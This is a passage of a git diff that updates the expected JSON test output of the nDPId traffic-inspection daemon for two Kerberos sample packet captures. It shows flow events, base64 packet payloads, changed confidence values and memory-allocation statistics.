-00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946716140238,"flow_last_seen":946716140238,"flow_idle_time":200000,"flow_min_l4_payload_len":1182,"flow_max_l4_payload_len":1211,"flow_tot_l4_payload_len":2393,"flow_avg_l4_payload_len":1196,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1090,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946716140476,"flow_last_seen":946716140476,"flow_idle_time":200000,"flow_min_l4_payload_len":1228,"flow_max_l4_payload_len":1235,"flow_tot_l4_payload_len":2463,"flow_avg_l4_payload_len":1231,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1092,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946716140774,"flow_last_seen":946716140774,"flow_idle_time":200000,"flow_min_l4_payload_len":1202,"flow_max_l4_payload_len":1221,"flow_tot_l4_payload_len":2423,"flow_avg_l4_payload_len":1211,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1096,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} -00690{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946724453221,"flow_last_seen":946724453222,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1555,"flow_tot_l4_payload_len":6218,"flow_avg_l4_payload_len":414,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"192.168.10.12","dst_ip":"192.168.10.3","src_port":44256,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} +00716{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":946724453221,"flow_last_seen":946724453221,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1555,"flow_tot_l4_payload_len":1555,"flow_avg_l4_payload_len":222,"midstream":0,"thread_ts_msec":946724453221,"l3_proto":"ip4","src_ip":"192.168.10.12","dst_ip":"192.168.10.3","src_port":44256,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"testbed1.ca","username":""}} +00734{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":35,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":946724453221,"flow_last_seen":946724453222,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1555,"flow_tot_l4_payload_len":4664,"flow_avg_l4_payload_len":424,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"192.168.10.12","dst_ip":"192.168.10.3","src_port":44256,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"testbed1.ca","username":"ubuntu64a"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946716066779,"flow_last_seen":946716066779,"flow_idle_time":200000,"flow_min_l4_payload_len":1189,"flow_max_l4_payload_len":1211,"flow_tot_l4_payload_len":2400,"flow_avg_l4_payload_len":1200,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1061,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946716067396,"flow_last_seen":946716067396,"flow_idle_time":200000,"flow_min_l4_payload_len":1192,"flow_max_l4_payload_len":1223,"flow_tot_l4_payload_len":2415,"flow_avg_l4_payload_len":1207,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1065,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946716067473,"flow_last_seen":946716067513,"flow_idle_time":200000,"flow_min_l4_payload_len":1205,"flow_max_l4_payload_len":1219,"flow_tot_l4_payload_len":2424,"flow_avg_l4_payload_len":1212,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1067,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946716067526,"flow_last_seen":946716067526,"flow_idle_time":200000,"flow_min_l4_payload_len":1187,"flow_max_l4_payload_len":1209,"flow_tot_l4_payload_len":2396,"flow_avg_l4_payload_len":1198,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1068,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946716067819,"flow_last_seen":946716067819,"flow_idle_time":200000,"flow_min_l4_payload_len":1186,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":2394,"flow_avg_l4_payload_len":1197,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1069,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946716089644,"flow_last_seen":946716089644,"flow_idle_time":200000,"flow_min_l4_payload_len":1233,"flow_max_l4_payload_len":1237,"flow_tot_l4_payload_len":2470,"flow_avg_l4_payload_len":1235,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1074,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946716089757,"flow_last_seen":946716089757,"flow_idle_time":200000,"flow_min_l4_payload_len":1205,"flow_max_l4_payload_len":1219,"flow_tot_l4_payload_len":2424,"flow_avg_l4_payload_len":1212,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1076,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946716138858,"flow_last_seen":946716138858,"flow_idle_time":200000,"flow_min_l4_payload_len":1186,"flow_max_l4_payload_len":1213,"flow_tot_l4_payload_len":2399,"flow_avg_l4_payload_len":1199,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1084,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946716139910,"flow_last_seen":946716139910,"flow_idle_time":200000,"flow_min_l4_payload_len":1202,"flow_max_l4_payload_len":1221,"flow_tot_l4_payload_len":2423,"flow_avg_l4_payload_len":1211,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1089,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946716140238,"flow_last_seen":946716140238,"flow_idle_time":200000,"flow_min_l4_payload_len":1182,"flow_max_l4_payload_len":1211,"flow_tot_l4_payload_len":2393,"flow_avg_l4_payload_len":1196,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1090,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946716140476,"flow_last_seen":946716140476,"flow_idle_time":200000,"flow_min_l4_payload_len":1228,"flow_max_l4_payload_len":1235,"flow_tot_l4_payload_len":2463,"flow_avg_l4_payload_len":1231,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1092,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946716140774,"flow_last_seen":946716140774,"flow_idle_time":200000,"flow_min_l4_payload_len":1202,"flow_max_l4_payload_len":1221,"flow_tot_l4_payload_len":2423,"flow_avg_l4_payload_len":1211,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1096,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} +00690{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946724453221,"flow_last_seen":946724453222,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1555,"flow_tot_l4_payload_len":6218,"flow_avg_l4_payload_len":414,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"192.168.10.12","dst_ip":"192.168.10.3","src_port":44256,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} 00566{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","packets-captured":39,"packets-processed":39,"total-skipped-flows":0,"total-l4-payload-len":35242,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":13,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":13,"total-idle-flows":13,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":71,"global_ts_msec":946724453222} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 39/39 @@ -77,9 +77,9 @@ ~~ total active/idle flows...: 13/13 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5883322 bytes -~~ total memory freed........: 5883322 bytes -~~ total allocations/frees...: 118202/118202 +~~ total memory allocated....: 6016956 bytes +~~ total memory freed........: 6016956 bytes +~~ total allocations/frees...: 120964/120964 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 470 chars ~~ json string max len.......: 2124 chars diff --git a/test/results/kerberos.pcap.out b/test/results/kerberos.pcap.out index 6317b3ab9..a63907b5c 100644 --- a/test/results/kerberos.pcap.out +++ b/test/results/kerberos.pcap.out @@ -2,21 +2,20 @@ 00548{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"kerberos.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1549337929790} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929790,"flow_last_seen":1549337929790,"flow_idle_time":7580000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":239,"midstream":1,"thread_ts_msec":1549337929790,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49157,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00774{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1549337929790,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":293,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":293,"pkt_l4_len":259,"thread_ts_msec":1549337929790,"pkt":"pB9ywglqAAgCHEeuCABFAAEXABdAAIAGkNisEAjJrBAICMAFAFiynbRHbznTnlAYAQAf5QAAAAAA62qB6DCB5aEDAgEFogMCAQqjFTATMBGhBAICAICiCQQHMAWgAwEB\/6SBwTCBvqAHAwUAQIEAEKEYMBagAwIBAaEPMA0bC2pvaG5zb24tcGMkohAbDmhhcHB5Y3JhZnQub3JnoyMwIaADAgECoRowGBsGa3JidGd0Gw5oYXBweWNyYWZ0Lm9yZ6URGA8yMDM3MDkxMzAyNDgwNVqmERgPMjAzNzA5MTMwMjQ4MDVapwYCBE7AFheoFTATAgESAgERAgEXAgEYAgL\/eQIBA6kdMBswGaADAgEUoRIEEEpPSE5TT04tUEMgICAgICA="} -00721{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929790,"flow_last_seen":1549337929790,"flow_idle_time":7580000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":239,"midstream":1,"thread_ts_msec":1549337929790,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49157,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}} +00721{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929790,"flow_last_seen":1549337929790,"flow_idle_time":7580000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":239,"midstream":1,"thread_ts_msec":1549337929790,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49157,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}} 00824{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1549337929790,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":332,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":332,"pkt_l4_len":298,"thread_ts_msec":1549337929790,"pkt":"AAgCHEeupB9ywglqCABFAAE+ExRAAIAGfbSsEAgIrBAIyQBYwAVvOdOesp21NlAYAQCkkQAAAAABEn6CAQ4wggEKoAMCAQWhAwIBHqQRGA8yMDE5MDIwNTAzMzg0OFqlBQIDBjUgpgMCARmpEBsOaGFwcHljcmFmdC5vcmeqIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDmhhcHB5Y3JhZnQub3JnrIGnBIGkMIGhMH6hAwIBE6J3BHUwczA0oAMCARKhLRsrSEFQUFlDUkFGVC5PUkdob3N0am9obnNvbi1wYy5oYXBweWNyYWZ0Lm9yZzAFoAMCARcwNKADAgEDoS0bK0hBUFBZQ1JBRlQuT1JHaG9zdGpvaG5zb24tcGMuaGFwcHljcmFmdC5vcmcwCaEDAgECogIEADAJoQMCARCiAgQAMAmhAwIBD6ICBAA="} -00729{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929790,"flow_last_seen":1549337929790,"flow_idle_time":7580000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1549337929790,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49157,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929811,"flow_last_seen":1549337929811,"flow_idle_time":7580000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":319,"midstream":1,"thread_ts_msec":1549337929811,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49158,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00882{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1549337929811,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1549337929811,"pkt":"pB9ywglqAAgCHEeuCABFAAFnABtAAIAGkISsEAjJrBAICMAGAFganBtaQ2U1slAYAQDaGgAAAAABO2qCATcwggEzoQMCAQWiAwIBCqNjMGEwTKEDAgECokUEQzBBoAMCARKiOgQ4YERcga5zFfjuo7+oqo0hJ6Udj7efOwOKKYJj6PKpxuETgzDcdt27IvGW9sEQ18QPUV\/drVuLVBwwEaEEAgIAgKIJBAcwBaADAQH\/pIHBMIG+oAcDBQBAgQAQoRgwFqADAgEBoQ8wDRsLam9obnNvbi1wYySiEBsOaGFwcHljcmFmdC5vcmejIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDmhhcHB5Y3JhZnQub3JnpREYDzIwMzcwOTEzMDI0ODA1WqYRGA8yMDM3MDkxMzAyNDgwNVqnBgIETsAWF6gVMBMCARICARECARcCARgCAv95AgEDqR0wGzAZoAMCARShEgQQSk9ITlNPTi1QQyAgICAgIA=="} -00721{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929811,"flow_last_seen":1549337929811,"flow_idle_time":7580000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":319,"midstream":1,"thread_ts_msec":1549337929811,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49158,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}} +00721{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929811,"flow_last_seen":1549337929811,"flow_idle_time":7580000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":319,"midstream":1,"thread_ts_msec":1549337929811,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49158,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}} 00610{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1549337929812,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":166,"pkt_l4_len":132,"thread_ts_msec":1549337929812,"pkt":"AAgCHEeupB9ywglqCABFAACYExlAAIAGflWsEAgIrBAIyQBYwAZDZTtmGpwcmVAYAQDnsgAAX5hri3Z\/opje40K53kwDKo2\/CTegm0pJkWpLVNFlnn\/MakUFXqKHv4CDtH2CbQqvJq\/ecJgxH2EwrzVmUcQk2zqXXjIwbkyszZ9\/Xc6IEgQ4qiI64lPzINS7ueVTbdUXk\/8v52QxoGdMilBjjWTAcQ=="} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929815,"flow_last_seen":1549337929815,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1549337929815,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49159,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00636{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1549337929815,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":191,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":191,"pkt_l4_len":157,"thread_ts_msec":1549337929815,"pkt":"pB9ywglqAAgCHEeuCABFAACxACFAAIAGkTSsEAjJrBAICMAHAFgBsoC8gS4auFAYAQDUqQAAiNeE+tCJIo9Cz1KFHGicigIlxkFIEVkb70vifDKvvi6NwB24GlkehWdocuUvESpeAqtSofWtuKDm2yskVOheE+r4DxaQxRLncJy9zYBP+p7ofQvBukmarkg+oY3ctA8jgj5BSy2yi42NlxJjhcjuX3ByLG+GD20zq41Le0TbPh0TFS5qkRb0Q24="} 00611{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1549337929815,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":169,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":169,"pkt_l4_len":135,"thread_ts_msec":1549337929815,"pkt":"AAgCHEeupB9ywglqCABFAACbEx9AAIAGfkysEAgIrBAIyQBYwAeBLiBsAbKBRVAYAQBP\/wAA1H56bb56rLTzhI\/so6pGl6jILu03bHY2ZWl4A41JY07Kavo1sQRKhlNPx3vE\/LdSF6BX6NLW1Fm3Tdmvr7ZEbPWOq8FZs9c0RBY7wJbwPUW44FlC0vhqJn1yGB3K1Fxl0gPqAAMzMrhupJQMQzjV4fgdag=="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929816,"flow_last_seen":1549337929816,"flow_idle_time":7580000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1431,"flow_tot_l4_payload_len":1431,"flow_avg_l4_payload_len":1431,"midstream":1,"thread_ts_msec":1549337929816,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49160,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 02387{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1549337929816,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1485,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1485,"pkt_l4_len":1451,"thread_ts_msec":1549337929816,"pkt":"pB9ywglqAAgCHEeuCABFAAW\/ACZAAIAGjCGsEAjJrBAICMAIAFgkzleN\/pyBM1AYAQCd1QAAAAAFk2yCBY8wggWLoQMCAQWiAwIBDKOCBRcwggUTMIIE\/6EDAgEBooIE9gSCBPJuggTuMIIE6qADAgEFoQMCAQ6iBwMFAAAAAACjggQ0YYIEMDCCBCygAwIBBaEQGw5IQVBQWUNSQUZULk9SR6IjMCGgAwIBAqEaMBgbBmtyYnRndBsOSEFQUFlDUkFGVC5PUkejggPsMIID6KADAgESoQMCAQKiggPaBIID1l4LwpNuTjPo\/WSca61wgawIInNQ2vTGqwCxtV1QigPfApKXxUIq16oPsvd5TUFFBoZ3psSaal0IeVBLFx\/BX1XOMXvlpVRB9MsTpZwTQ9ax1GLB6I2i5bbUZpknsnBAKrSXL695P06nXI2pxBPckcoFwJAlSBEmG2XByE8IS7rO1EarXMbJ6Y6aTY3qAJfaaRab4